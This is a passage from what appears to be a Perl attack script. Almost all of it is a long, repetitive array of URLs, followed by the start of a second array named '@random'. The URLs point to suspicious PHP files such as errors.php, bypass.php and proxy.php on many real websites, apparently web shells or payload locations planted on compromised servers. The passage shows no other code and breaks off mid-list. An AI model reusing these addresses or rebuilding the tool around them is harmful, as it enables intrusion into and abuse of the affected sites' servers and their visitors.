"http://greenpowerguy.com/blog/wp-content/themes/error.php", "http://www.servercms.com/baldassarretipografi/wp-content/themes/error.php", "http://www.omacmortgages.ie/error.php", "http://erofeydv.ru/wp-includes/error.php", "http://king-solarman.com/skin/adminhtml/base/error.php", "http://waiwaiopticfiber.com.br/plugins/editors/errors.php", "http://moveisperetti.com.br/plugins/editors/errors.php", "http://www.rudlucchbe.com/errors.php", "http://www.dp-cons.ro//wp-includes/error.php", "http://shop.progress-studio.com.ua/error.php", "http://mnstyle.eu/media/catalog/product/errors.php", "http://www.cossconsulting.com/errors.php", "http://trakimtuong.vn/admin/webroot/cache/Shel/errors.php", "https://www.ach.cl/wp-admin/includes/errors.php", "https://choptop.stage.city/picasa.net/errors.php", "https://www.debbiedawtrey.co.uk/wp-admin/includes/errors.php", "http://www.corteganamedieval.com/components/com_content/views/section/tmpl/page-sidebar.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.flatertheek.nl/wp-includes/SimplePie/http/search.php", "http://newpl.imul.pl/errors.php", "http://theitaliancorner.co.uk/wp-includes/theme-compat/comments-footer.php", "http://rpaisa.com/wp-con.php", "http://www.jobsforfive.com/wp-admin/edit-link.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.flatertheek.nl/wp-includes/SimplePie/http/search.php", "http://www.vipesrl.it/gruppo/config.inc.php", "http://newpl.imul.pl/errors.php", "http://theitaliancorner.co.uk/wp-includes/theme-compat/comments-footer.php", "http://www.vipesrl.it/gruppo/config.inc.php", "http://www.psdf.org.pk/errors.php", "http://imotionasia.com.vn/errors.php", "http://www.promidea.it//errors.php", "http://www.ims.co.ke/errors.php", "http://www.cantalindustrie.com/wp/wp-content/themes/errors.php", "http://www.flatertheek.nl/wp-includes/SimplePie/http/search.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://fusildechispas.com/errors.php", "https://www.cloudipalarm.nl/wp-content/plugins/revslider/temp/errors.php", "http://www.psdf.org.pk/errors.php", "http://www.ims.co.ke/errors.php", "http://www.psdf.org.pk/errors.php", "http://fusildechispas.com/errors.php", "http://rpaisa.com/wp-con.php", "http://www.corteganamedieval.com/components/com_content/views/section/tmpl/page-sidebar.php", "http://www.flatertheek.nl/wp-includes/SimplePie/http/search.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://fusildechispas.com/errors.php", "http://www.psdf.org.pk/errors.php", "http://www.flatertheek.nl/wp-includes/SimplePie/http/search.php", "http://theitaliancorner.co.uk/wp-includes/theme-compat/comments-footer.php", "http://www.psdf.org.pk/errors.php", "https://savannasolutions.co.zm/errors.php", "http://newpl.imul.pl/errors.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.flatertheek.nl/wp-includes/SimplePie/http/search.php", "http://rpaisa.com/wp-con.php", "https://www.cloudipalarm.nl/wp-content/plugins/revslider/temp/errors.php", "http://fusildechispas.com/errors.php", "http://rpaisa.com/wp-con.php", "http://ersaf.it/errors.php", "http://www.xinh-sushi.de/errors.php", "http://www.fhdynamics.com/errors.php", "http://cilfowyr.co.uk/errors.php", "http://www.scribbly.net/2013/errors.php", "http://www.dso.phpcmsmodx.info/core/components/elrte/testing//errors.php", "http://core.sportandexercisemedicineacademy.co.uk/errors.php", "http://portalacademicounid.we-know.net/LearnDash/errors.php", "http://djltraining.trainingassociates.us/errors.php", "http://simplychristianbookclub.com/errors.php", "http://kellymarielane.com/more/errors.php", "http://training.beekmanresources.co.za/errors.php", "http://allonymousbooks.com/errors.php", "http://www.crackbig.com/errors.php", "http://surgicalleadershipalliance.org/errors.php", "http://www.triadsquare.com/errors.php", "http://www.yogaeducational.org//errors.php", "http://www.dimensionetv.com//errors.php", "http://www.aubordduciel.fr/errors.php", "http://www.neuro-sono.med.br/errors.php", "http://condomini.caricato.eu/errors.php", "http://opieka.radom.pl/errors.php", "http://hevilemmetal.com.br/errors.php", "http://austerdigitalpunch.com/errors.php", "http://f.potolok.kg/errors.php", "http://fhdynamics.com/errors.php", "http://www.dimensionetv.com//errors.php", "http://www.fzzz.ba/phpthumb//errors.php", "http://www.fzzz.ba//errors.php", "http://www.descarsnc.it/errors.php", "http://www.veronikagazeau.com/errors.php", "http://www.teho.com.sg//errors.php", "http://core.sportandexercisemedicineacademy.co.uk/errors.php", "http://daniel123.co.za/errors.php", "http://hevilemmetal.com.br/errors.php", "http://training.beekmanresources.co.za/errors.php", "http://batizandras.hu/errors.php", "http://training.beekmanresources.co.za/errors.php", "http://kellymarielane.com/more/errors.php", "http://core.sportandexercisemedicineacademy.co.uk/errors.php", "opieka.radom.pl/errors.php", "http://www.clinicalosfundadores.cl/errors.php", "http://martysautoandtowing.com/errors.php", "http://www.derrjob.com/errors.php", "http://www.ecolombiatours.com/errors.php", "http://www.infolor.fr/errors.php", "http://www.masfarne.info/errors.php", "http://fundacioncimientos.org/errors.php", "http://constructiidelemnpegas.ro/errors.php", "http://produkcja.rolnicy.com//components/com_wrapper/errors.php", "http://dominicanway.com//components/com_alphacontent/assets/phpThumb/errors.php", "http://www.economicswork.ru//plugins/editors/errors.php", "http://lexiquedumanagement.com//components/com_alphacontent/assets/phpThumb/errors.php", "http://sellallmyideas.com/errors.php", "http://www.artiste-peintre-figuratif.com/huile-aquarelle//components/com_alphacontent/assets/phpThumb/errors.php", "http://www.cchm.ca/components/com_mailto/error.php", "http://www.bortolotto.eu/plugins/editors/error.php", "http://www.gambinigroup.it/media/mailto/error.php", "http://zemnoe.ru/wp-includes/error.php", "http://politics.cnm.com.pt/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://dailyfresh.nu/Hotfrog/errors.php", "http://www.thai-orchidea.cz/modules/mod_login/error.php", "http://ivanous.free.fr/camu_s_world/images/stories/jump.php", "http://www.ecomuseudelblat.cat/errors.php", "http://dailyfresh.nu/Hotfrog/errors.php", "http://interminas.ddns.net/errors.php", "http://www.pebk.de/joomla/components/com_mailto/error.php", "http://www.thermona-ekb.ru/errors.php", "http://imotionasia.com.vn/errors.php", "http://www.orfej.si/components/com_mailto/error.php", "http://www.petropolis.rj.gov.br/intranet/components/com_mailto/error.php", "http://bioenfapesp.org/media/mailto/error.php", "http://www.tkofschip.be/joomlasites/ankerintranet5/plugins/content/config.index.php", "http://therfw.com/wp-includes/error.php", "http://bigbananawatch.com/wp-content/themes/bigbananawatch/error.php", "http://gobll.pl/errors.php", "http://www.yplittleport.org.uk/media/system/config.index.php", "http://greenpowerguy.com/blog/wp-content/themes/error.php", "http://ivanous.free.fr/camu_s_world/images/stories/jump.php", "http://www.austriasport.nl/wp-includes/errors.php", "http://www.corteganamedieval.com/components/com_content/views/section/tmpl/page-sidebar.php", "http://www.pessebristassumpcio.com/wp-includes/error.php", "http://www.thai-orchidea.cz/modules/mod_login/error.php", "http://www.flowershop-neo.com/wp-includes/error.php", "http://www.mondragonlingua.com/formacion/components/com_users/search.php", "http://exhibcouples.fr/errors.php", "http://iheld.com/errors.php", "http://www.kathleenferrari.com/errors.php", "http://www.amslight.com/errors.php", "http://pastorbonus.sk/errors.php", "http://www.saboeiro.pt/errors.php", "http://hlmais.com.br/mundo/wp-content/themes/twentyten/error.php", "http://treboliberica.com/includes/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://imotionasia.com.vn/errors.php", "http://www.petropolis.rj.gov.br/intranet/components/com_mailto/error.php", "http://bioenfapesp.org/media/mailto/error.php", "http://www.tcfa1.net/errors.php", "http://dailyfresh.nu/errors.php", "http://www.cchm.ca/components/com_mailto/error.php", "http://www.bortolotto.eu/plugins/editors/error.php", "http://www.cchm.ca/components/com_mailto/error.php", "http://www.bortolotto.eu/plugins/editors/error.php", "http://www.gambinigroup.it/media/mailto/error.php", "http://zemnoe.ru/wp-includes/error.php", "http://politics.cnm.com.pt/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://dailyfresh.nu/Hotfrog/errors.php", "http://produkcja.rolnicy.com//components/com_wrapper/errors.php", "http://sellallmyideas.com/errors.php", "http://greenpowerguy.com/blog/wp-content/themes/error.php", "http://bioenfapesp.org/media/mailto/error.php", "http://lexiquedumanagement.com//components/com_alphacontent/assets/phpThumb/errors.php", "http://www.yplittleport.org.uk/media/system/config.index.php", "http://www.pessebristassumpcio.com/wp-includes/error.php", "http://www.cchm.ca/components/com_mailto/error.php", "http://www.austriasport.nl/wp-includes/errors.php", "http://www.corteganamedieval.com/components/com_content/views/section/tmpl/page-sidebar.php", "http://exhibcouples.fr/errors.php", "http://ivanous.free.fr/camu_s_world/images/stories/jump.php", "http://citizenofburma.org//plugins/content/errors.php", "http://treboliberica.com/includes/errors.php", "http://www.tkofschip.be/joomlasites/ankerintranet5/plugins/content/config.index.php", "http://centralcaixas.com/mdf/errors.php", "http://ecom.wilburhuang.com/errors.php", "http://pastorbonus.sk/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://hlmais.com.br/mundo/wp-content/themes/twentyten/error.php", "http://gdthuyphuong.free.fr//includes/errors.php", "http://interminas.ddns.net/errors.php", "http://cnsave.koray.cn/errors.php", "http://www.thai-orchidea.cz/modules/mod_login/error.php", "http://www.gambinigroup.it/media/mailto/error.php", "http://shardha.in/errors.php", "http://bigbananawatch.com/wp-content/themes/bigbananawatch/error.php", "http://politics.cnm.com.pt/errors.php", "http://imotionasia.com.vn/errors.php", "http://tsat-dashboard.com/videocache/bypass.php", "http://www.mirabalcenter.org//errors.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.zsp.karpacz.pl//libraries/joomla/document/index.php", "http://automarket-fortuna.ru/errors.php", "http://virtual-aerospace.co.jp//errors.php", "http://www.pricepaving.com//wp-includes/js/plupload/index.php", "https://gpscsomagok.hu/skin/bypass.php", "http://www.studio-aid.it//libraries/joomla/database/index.php", "http://hoponhopoff.ge//errors.php", "http://metroway.com/wp-includes/ID3/proxy.php", "http://chaoscollective.in/administrator/components/com_weblinks/views/errors.php", "http://www.cannell-immobilier.com/errors.php", "http://www.alexgretter.com/google.php", "http://www.photodesign.uncanny.cz/images/error.php", "http://sufbellman.dk/media/error.php", "http://turkishonline.ru//media/system/js/error.php", "http://virtual-aerospace.co.jp/errors.php", "http://www.shturmovoi.ru/components/com_mailto/error.php", "http://www.rateavon.je/error.php", "http://circuitec.com.br/errors.php", "http://pngk.kz/media/media/css/index.php", "http://www.mariobabiera.com/google.php", "http://www.alvestaguesthouse.co.za/wp-content/themes/welcome_inn/cache/pro.php", "http://www.psdf.org.pk/errors.php", "http://king-solarman.com/skin/adminhtml/base/error.php", "http://www.acdt-manutention.fr/errors.php", "http://www.ares-asesores.com/ares/wp-content/languages/error.php", "http://pnpdistribuidora.com.br//erros/errors.php", "http://clinicavanity.com.br/2012/wp-includes/error.php", "http://www.imc-egypt.org//cli/error.php", "http://pnpdistribuidora.com.br//errors.php", "http://www.karpet.cz/media/system/js/jquery.php", "http://www.baliste-club.org//media/errors.php", "http://gaysm.pl/media/errors.php", "http://www.semneartemis.ro/images/errors.php", "http://www.baskingshark.ie//media/errors.php", "http://representacoesdasa.com.br/wp-admin/errors.php", "http://ajansfestival.com/wp-admin/user/error.php", "https://www.cloudipalarm.nl/wp-content/plugins/revslider/temp/errors.php", "http://gaysm.pl/flash/modules/global/js/errors.php", "http://www.pece.com.my/2014/wp-content/themes/Avada/framework/error.php", "http://oldfashionedman.com//errors.php", "http://www.shg-vaskulitis-eifel-mosel.de//forum/style/portal/error.php", "http://www.addisyouth.org.et/components/com_mailto/error.php", "http://tricotrico.com/wp-includes/error.php", "http://printfastt.com.br/errors.php", "http://www.gramophoneshop.nl/webshop//skin/frontend/default/errors.php", "http://www.skipperdean.com//media/errors.php", "http://prweb.com.sg/maimee/errors.php", "http://cmtactical.com//skin/install/default/default/errors.php", "http://www.lmcreativedesign.com.br/wp-content/plugins/errors.php", "https://www.aavamobile.com/modules/mod_search/index.php", "http://donghohanghieu.diemnhan.net//errors.php", "http://www.internetrights.in/wp-content/plugins/contact-form-7/images/service-icons/errors.php", "http://www.copati.org.br//images/jdownloads/screenshots/thumbnails/errors.php", "http://www.economicswork.ru//plugins/editors/errors.php", "http://lexiquedumanagement.com//components/com_alphacontent/assets/phpThumb/errors.php", "http://sellallmyideas.com/errors.php", "http://www.artiste-peintre-figuratif.com/huile-aquarelle//components/com_alphacontent/assets/phpThumb/errors.php", "http://www.cchm.ca/components/com_mailto/error.php", "http://www.bortolotto.eu/plugins/editors/error.php", "http://www.gambinigroup.it/media/mailto/error.php", "http://zemnoe.ru/wp-includes/error.php", "http://politics.cnm.com.pt/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://dailyfresh.nu/Hotfrog/errors.php", "http://www.thai-orchidea.cz/modules/mod_login/error.php", "http://ivanous.free.fr/camu_s_world/images/stories/jump.php", "http://dailyfresh.nu/Hotfrog/errors.php", "http://interminas.ddns.net/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://imotionasia.com.vn/errors.php", "http://www.orfej.si/components/com_mailto/error.php", "http://www.petropolis.rj.gov.br/intranet/components/com_mailto/error.php", "http://bioenfapesp.org/media/mailto/error.php", "http://cccjamaica.org/cccj_main/media/mailto/error.php", "http://www.tkofschip.be/joomlasites/ankerintranet5/plugins/content/config.index.php", "http://bigbananawatch.com/wp-content/themes/bigbananawatch/error.php", "http://www.yplittleport.org.uk/media/system/config.index.php", "http://greenpowerguy.com/blog/wp-content/themes/error.php", "http://ivanous.free.fr/camu_s_world/images/stories/jump.php", "http://www.austriasport.nl/wp-includes/errors.php", "http://www.corteganamedieval.com/components/com_content/views/section/tmpl/page-sidebar.php", "http://www.pessebristassumpcio.com/wp-includes/error.php", "http://www.thai-orchidea.cz/modules/mod_login/error.php", "http://www.flowershop-neo.com/wp-includes/error.php", "http://exhibcouples.fr/errors.php", "http://iheld.com/errors.php", "http://www.kathleenferrari.com/errors.php", "http://pastorbonus.sk/errors.php", "http://hlmais.com.br/mundo/wp-content/themes/twentyten/error.php", "http://treboliberica.com/includes/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://imotionasia.com.vn/errors.php", "http://www.petropolis.rj.gov.br/intranet/components/com_mailto/error.php", "http://bioenfapesp.org/media/mailto/error.php", "http://dailyfresh.nu/errors.php", "http://www.cchm.ca/components/com_mailto/error.php", "http://www.bortolotto.eu/plugins/editors/error.php", "http://www.cchm.ca/components/com_mailto/error.php", "http://www.bortolotto.eu/plugins/editors/error.php", "http://www.gambinigroup.it/media/mailto/error.php", "http://zemnoe.ru/wp-includes/error.php", "http://politics.cnm.com.pt/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://dailyfresh.nu/Hotfrog/errors.php", "http://www.thai-orchidea.cz/modules/mod_login/error.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://greenpowerguy.com/blog/wp-content/themes/error.php", "http://younik.co/error.php", "http://candidfeet.org/clip//admin_area/charts/tmp-upload-images/error.php", "http://cichlid77.free.fr/errors.php", "http://www.liftmaxthailand.com/downloader/template/errors.php", "http://www.petcubes.com.sg/downloader/Maged/Connect/options-header.php", "http://www.liftmaxthailand.com/js/options-header.php", "http://fifacompet.free.fr/components/com_joomleague/assets/errors.php", "http://www.avzootice.cz/includes/js/index2.php", "http://gentleheart.cz/includes/js/index2.php", "http://www.voyage-cambodge.org//images/banners/error.php", "http://www.austriasport.nl/wp-includes/errors.php", "http://www.dom-sad-ogorod.ru/plugins/search/config.inc.php", "http://www.bam.co.th/bam/corporate/xmlrpc/index2.php", "http://imotionasia.com.vn/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://www.ursaminorvehicles.com/errors/default/css/error.php", "http://patachou.com/js/lib/search.php", "http://www.energeticevolution.net/js/lib/search.php", "https://www.clematixdigital.com/errors/default/css/error.php", "http://www.mypgmee.com/media/catalog/product/2/error.php", "http://sales.luxxeen.com/errors/default/css/error.php", "http://www.exhibcouples.fr/errors.php", "http://www.tileandbathco.com/errors/default/css/error.php", "http://isnoffices.com/wp-content/themes/kim-remi/fonts/error.php", "http://chapmancycles.com/wp-admin/edit-link.php", "http://iweb365.co/errors/default/css/error.php", "http://bioenfapesp.org/media/mailto/error.php", "http://cccjamaica.org/cccj_main/media/mailto/error.php", "http://pngk.kz//logs/errors.php", "http://adoma.sk/errors.php", "http://www.veterinaigle.ch//media/errors.php", "http://dom-sad-ogorod.ru/plugins/search/config.inc.php", "http://king-solarman.com/skin/adminhtml/base/error.php", "http://www.techlane.com.sg/errors.php", "http://www.alvestaguesthouse.co.za/wp-content/themes/welcome_inn/cache/pro.php", "http://www.karpet.cz/media/system/js/jquery.php", "http://godreamsleepingbag.com/errors.php", "http://www.thaihospitalbed.com/var/locks/error.php", "http://www.eyeforce.com.tr/var/pass/search.php", "http://valentealexvalente.com/alex/wp-includes/error.php", "http://www.elado.ro//xmlrpc/error.php", "http://blog.eurostargym.com/wp-includes/js/thickbox/class-mail.php", "http://www.windfellows.org//plugins/editors/rokpad/error.php", "http://milesnation.com/whitney/css/error.php", "http://www.gardenmachinery.ie/errors.php", "http://www.petropolis.rj.gov.br/intranet/components/com_mailto/error.php", "http://www.telsonet.pl/errors.php", "http://www.gambinigroup.it/media/mailto/error.php", "http://www.alexgretter.com/google.php", "http://www.pastorbonus.sk/errors.php", "http://www.cannell-immobilier.com/errors.php", "http://www.photodesign.uncanny.cz/images/error.php", "http://circuitec.com.br/errors.php", "http://www.theatresprives.com/errors.php", "http://sufbellman.dk/media/error.php", "http://www.mariobabiera.com/google.php", "http://dailyfresh.nu/errors.php", "http://virtual-aerospace.co.jp/errors.php", "http://deangelisviaggi.it/errors.php", "http://pastorbonus.sk/errors.php", "http://metroway.com/wp-includes/ID3/proxy.php", "http://www.psdf.org.pk/errors.php", "http://iheld.com/errors.php", "http://bohealth.eu/media/com_jantivirus/css/index.php", "http://printfastt.com.br/errors.php", "http://pngk.kz/media/media/css/index.php", "http://www.yplittleport.org.uk/media/system/config.index.php", "http://www.shturmovoi.ru/components/com_mailto/error.php", "http://www.kawaiishop.fr/var/pass/search.php", "http://lisarkent.com/errors.php", "http://savvyschools.ie/wp-includes/images/pass/script-loader.php", "http://www.tkofschip.be/joomlasites/ankerintranet5/plugins/content/config.index.php", "http://blizzsozz.com/errors.php", "http://www.cchm.ca/components/com_mailto/error.php", "http://turkishonline.ru//media/system/js/error.php", "http://chaoscollective.in/administrator/components/com_weblinks/views/errors.php", "http://www.bortolotto.eu/plugins/editors/error.php", "http://www.mirabalcenter.org//errors.php", "http://www.pessebristassumpcio.com/wp-includes/error.php", "http://ivanous.free.fr/camu_s_world/images/stories/jump.php", "http://www.pricepaving.com//wp-includes/js/plupload/index.php", "http://www.corteganamedieval.com/components/com_content/views/section/tmpl/page-sidebar.php", "http://www.zsp.karpacz.pl//libraries/joomla/document/index.php", "http://www.studio-aid.it//libraries/joomla/database/index.php", "http://www.immobilienparaguay.com.py//templates/error.php", "http://muckrossparkcollege.com//plugins/editors/tinymce/error.php", "http://belarus-theatre.net/error.php", "http://www.decret-pinel.fr/wp-includes/error.php", "http://howfarbooks.com//images/stories/errors.php", "http://zemnoe.ru/wp-includes/error.php", "http://politics.cnm.com.pt/errors.php", "http://dailyfresh.nu/Hotfrog/errors.php", "http://www.thai-orchidea.cz/modules/mod_login/error.php", "http://interminas.ddns.net/errors.php", "http://www.orfej.si/components/com_mailto/error.php", "http://bigbananawatch.com/wp-content/themes/bigbananawatch/error.php", "http://www.flowershop-neo.com/wp-includes/error.php", "http://exhibcouples.fr/errors.php", "http://www.kathleenferrari.com/errors.php", "http://hlmais.com.br/mundo/wp-content/themes/twentyten/error.php", "http://treboliberica.com/includes/errors.php", "http://australiansuperaudit.com.au/errors.php", "http://komunikacyjni.pl/wp-content/calander-date.php", "http://austriasport.nl/wp-includes/errors.php", "http://www.conac.cl/errors.php", "http://www.sci.kmutnb.ac.th/web/components/com_mailto/error.php", "http://beghellichina.com//media/system/js/error.php", "http://www.iek.kol.pl//media/system/css/error.php", "http://www.esteticaraffinata.com.br/errors.php", "http://www.studiofifteen.in/errors.php", "http://www.ibi.edu.au/includes/error.php", "http://www.omacmortgages.ie/error.php", "http://www.h-herms.es/wp-includes/error.php", "http://erofeydv.ru/wp-includes/error.php", "http://madmanslay.free.fr/administrator/components/com_content/views/element/errors.php", "http://www.jourdets.com/piwik/libs/open-flash-chart/tmp-upload-images/error.php", "http://clinicavanity.com.br/2012/wp-includes/error.php", "http://www.bigswedestudios.com/errors.php", "http://www.isidarbink.lt/errors.php", "http://akcnibazar.cz/errors.php", "https://www.mypgmee.com/media/catalog/product/2/error.php", "http://www.mypgmee.com/media/catalog/product/2/search.php", "http://www.pastryideas.gr/skin/frontend/search.php", "http://www.rmk.te.ua//components/com_content/models/google.php", "http://www.lafutbolera.net/images/error.php", "http://www.pece.com.my/2014/wp-content/themes/Avada/framework/error.php", "http://www.ares-asesores.com/ares/wp-content/languages/error.php", "http://member.marketingbodz.com/error.php", "http://kontento.eu/wp-content/themes/smartbox-theme/error.php", "http://www.oldfashionedman.com/errors.php", "citizenofburma.org//plugins/content/errors.php", "http://choir.louwanjpoujezi.org//plugins/content/errors.php", "http://gdthuyphuong.free.fr//includes/errors.php", "http://cnsave.koray.cn/errors.php", "http://ecom.wilburhuang.com/errors.php", "http://centralcaixas.com/mdf/errors.php", "http://shardha.in/errors.php", "http://automarket-fortuna.ru/errors.php", "http://tsat-dashboard.com/videocache/bypass.php", "http://zend.secl.com.ua/media/bypass.php", "https://gpscsomagok.hu/skin/bypass.php", "http://hoponhopoff.ge//errors.php", "http://virtual-aerospace.co.jp//errors.php", "http://www.rotarymowers.com.au/skin/errors.php", "http://www.travelpointer.ro//wp-includes/js/plupload/index.php", "http://www.atopsuccess.com//plugins/editors/error.php", "http://www.pkstorages.com//plugins/content/seka.php", "http://www.rateavon.je/error.php", "http://dateakademie.de/wp-includes/error.php", "http://themansphere.com/wp-includes/error.php", "http://hoponhopoff.ge/errors.php", "http://directproducts.co.zw/errors.php", "http://www.acdt-manutention.fr/errors.php", "http://www.semneartemis.ro/images/errors.php", "http://pnpdistribuidora.com.br//erros/errors.php", "http://www.imc-egypt.org//cli/error.php", "http://pnpdistribuidora.com.br//errors.php" ); my @random = ("http://produkcja.rolnicy.com//components/com_wrapper/errors.php", "http://sellallmyideas.com/errors.php", "http://greenpowerguy.com/blog/wp-content/themes/error.php", "http://bioenfapesp.org/media/mailto/error.php", "http://lexiquedumanagement.com//components/com_alphacontent/assets/phpThumb/errors.php", "http://www.yplittleport.org.uk/media/system/config.index.php", "http://www.pessebristassumpcio.com/wp-includes/error.php", "http://www.cchm.ca/components/com_mailto/error.php", "http://www.austriasport.nl/wp-includes/errors.php", "http://www.corteganamedieval.com/components/com_content/views/section/tmpl/page-sidebar.php", "http://exhibcouples.fr/errors.php", "http://ivanous.free.fr/camu_s_world/images/stories/jump.php", "http://citizenofburma.org//plugins/content/errors.php", "http://treboliberica.com/includes/errors.php", "http://www.tkofschip.be/joomlasites/ankerintranet5/plugins/content/config.index.php", "http://centralcaixas.com/mdf/errors.php", "http://ecom.wilburhuang.com/errors.php", "http://pastorbonus.sk/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://hlmais.com.br/mundo/wp-content/themes/twentyten/error.php", "http://gdthuyphuong.free.fr//includes/errors.php", "http://interminas.ddns.net/errors.php", "http://cnsave.koray.cn/errors.php", "http://www.thai-orchidea.cz/modules/mod_login/error.php", "http://www.gambinigroup.it/media/mailto/error.php", "http://shardha.in/errors.php", "http://bigbananawatch.com/wp-content/themes/bigbananawatch/error.php", "http://politics.cnm.com.pt/errors.php", "http://imotionasia.com.vn/errors.php", "http://tsat-dashboard.com/videocache/bypass.php", "http://www.mirabalcenter.org//errors.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.zsp.karpacz.pl//libraries/joomla/document/index.php", "http://automarket-fortuna.ru/errors.php", "http://virtual-aerospace.co.jp//errors.php", "http://www.pricepaving.com//wp-includes/js/plupload/index.php", "https://gpscsomagok.hu/skin/bypass.php", "http://www.studio-aid.it//libraries/joomla/database/index.php", "http://hoponhopoff.ge//errors.php", "http://metroway.com/wp-includes/ID3/proxy.php", "http://chaoscollective.in/administrator/components/com_weblinks/views/errors.php", "http://www.cannell-immobilier.com/errors.php", "http://www.alexgretter.com/google.php", "http://www.photodesign.uncanny.cz/images/error.php", "http://sufbellman.dk/media/error.php", "http://turkishonline.ru//media/system/js/error.php", "http://virtual-aerospace.co.jp/errors.php", "http://www.shturmovoi.ru/components/com_mailto/error.php", "http://www.rateavon.je/error.php", "http://circuitec.com.br/errors.php", "http://pngk.kz/media/media/css/index.php", "http://www.mariobabiera.com/google.php", "http://www.alvestaguesthouse.co.za/wp-content/themes/welcome_inn/cache/pro.php", "http://www.psdf.org.pk/errors.php", "http://king-solarman.com/skin/adminhtml/base/error.php", "http://www.acdt-manutention.fr/errors.php", "http://www.ares-asesores.com/ares/wp-content/languages/error.php", "http://pnpdistribuidora.com.br//erros/errors.php", "http://clinicavanity.com.br/2012/wp-includes/error.php", "http://www.imc-egypt.org//cli/error.php", "http://pnpdistribuidora.com.br//errors.php", "http://www.karpet.cz/media/system/js/jquery.php", "http://www.baliste-club.org//media/errors.php", "http://gaysm.pl/media/errors.php", "http://www.semneartemis.ro/images/errors.php", "http://www.baskingshark.ie//media/errors.php", "http://representacoesdasa.com.br/wp-admin/errors.php", "http://ajansfestival.com/wp-admin/user/error.php", "https://www.cloudipalarm.nl/wp-content/plugins/revslider/temp/errors.php", "http://gaysm.pl/flash/modules/global/js/errors.php", "http://www.pece.com.my/2014/wp-content/themes/Avada/framework/error.php", "http://oldfashionedman.com//errors.php", "http://www.shg-vaskulitis-eifel-mosel.de//forum/style/portal/error.php", "http://www.addisyouth.org.et/components/com_mailto/error.php", "http://tricotrico.com/wp-includes/error.php", "http://printfastt.com.br/errors.php", "http://www.gramophoneshop.nl/webshop//skin/frontend/default/errors.php", "http://www.skipperdean.com//media/errors.php", "http://prweb.com.sg/maimee/errors.php", "http://cmtactical.com//skin/install/default/default/errors.php", "http://www.lmcreativedesign.com.br/wp-content/plugins/errors.php", "https://www.aavamobile.com/modules/mod_search/index.php", "http://donghohanghieu.diemnhan.net//errors.php", "http://www.internetrights.in/wp-content/plugins/contact-form-7/images/service-icons/errors.php", "http://www.copati.org.br//images/jdownloads/screenshots/thumbnails/errors.php", "http://www.economicswork.ru//plugins/editors/errors.php", "http://lexiquedumanagement.com//components/com_alphacontent/assets/phpThumb/errors.php", "http://sellallmyideas.com/errors.php", "http://www.artiste-peintre-figuratif.com/huile-aquarelle//components/com_alphacontent/assets/phpThumb/errors.php", "http://www.cchm.ca/components/com_mailto/error.php", "http://www.bortolotto.eu/plugins/editors/error.php", "http://www.gambinigroup.it/media/mailto/error.php", "http://zemnoe.ru/wp-includes/error.php", "http://politics.cnm.com.pt/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://dailyfresh.nu/Hotfrog/errors.php", "http://www.thai-orchidea.cz/modules/mod_login/error.php", "http://ivanous.free.fr/camu_s_world/images/stories/jump.php", "http://dailyfresh.nu/Hotfrog/errors.php", "http://interminas.ddns.net/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://imotionasia.com.vn/errors.php", "http://www.orfej.si/components/com_mailto/error.php", "http://www.petropolis.rj.gov.br/intranet/components/com_mailto/error.php", "http://bioenfapesp.org/media/mailto/error.php", "http://cccjamaica.org/cccj_main/media/mailto/error.php", "http://www.tkofschip.be/joomlasites/ankerintranet5/plugins/content/config.index.php", "http://bigbananawatch.com/wp-content/themes/bigbananawatch/error.php", "http://www.yplittleport.org.uk/media/system/config.index.php", "http://greenpowerguy.com/blog/wp-content/themes/error.php", "http://ivanous.free.fr/camu_s_world/images/stories/jump.php", "http://www.austriasport.nl/wp-includes/errors.php", "http://www.corteganamedieval.com/components/com_content/views/section/tmpl/page-sidebar.php", "http://www.pessebristassumpcio.com/wp-includes/error.php", "http://www.thai-orchidea.cz/modules/mod_login/error.php", "http://www.flowershop-neo.com/wp-includes/error.php", "http://exhibcouples.fr/errors.php", "http://iheld.com/errors.php", "http://www.kathleenferrari.com/errors.php", "http://pastorbonus.sk/errors.php", "http://hlmais.com.br/mundo/wp-content/themes/twentyten/error.php", "http://treboliberica.com/includes/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://imotionasia.com.vn/errors.php", "http://www.petropolis.rj.gov.br/intranet/components/com_mailto/error.php", "http://bioenfapesp.org/media/mailto/error.php", "http://dailyfresh.nu/errors.php", "http://www.cchm.ca/components/com_mailto/error.php", "http://www.bortolotto.eu/plugins/editors/error.php", "http://www.cchm.ca/components/com_mailto/error.php", "http://www.bortolotto.eu/plugins/editors/error.php", "http://www.gambinigroup.it/media/mailto/error.php", "http://zemnoe.ru/wp-includes/error.php", "http://politics.cnm.com.pt/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://dailyfresh.nu/Hotfrog/errors.php", "http://www.thai-orchidea.cz/modules/mod_login/error.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://greenpowerguy.com/blog/wp-content/themes/error.php", "http://younik.co/error.php", "http://candidfeet.org/clip//admin_area/charts/tmp-upload-images/error.php", "http://cichlid77.free.fr/errors.php", "http://www.liftmaxthailand.com/downloader/template/errors.php", "http://www.petcubes.com.sg/downloader/Maged/Connect/options-header.php", "http://www.liftmaxthailand.com/js/options-header.php", "http://fifacompet.free.fr/components/com_joomleague/assets/errors.php", "http://www.avzootice.cz/includes/js/index2.php", "http://gentleheart.cz/includes/js/index2.php", "http://www.voyage-cambodge.org//images/banners/error.php", "http://www.austriasport.nl/wp-includes/errors.php", "http://www.dom-sad-ogorod.ru/plugins/search/config.inc.php", "http://www.bam.co.th/bam/corporate/xmlrpc/index2.php", "http://imotionasia.com.vn/errors.php", "http://www.thermona-ekb.ru/errors.php", 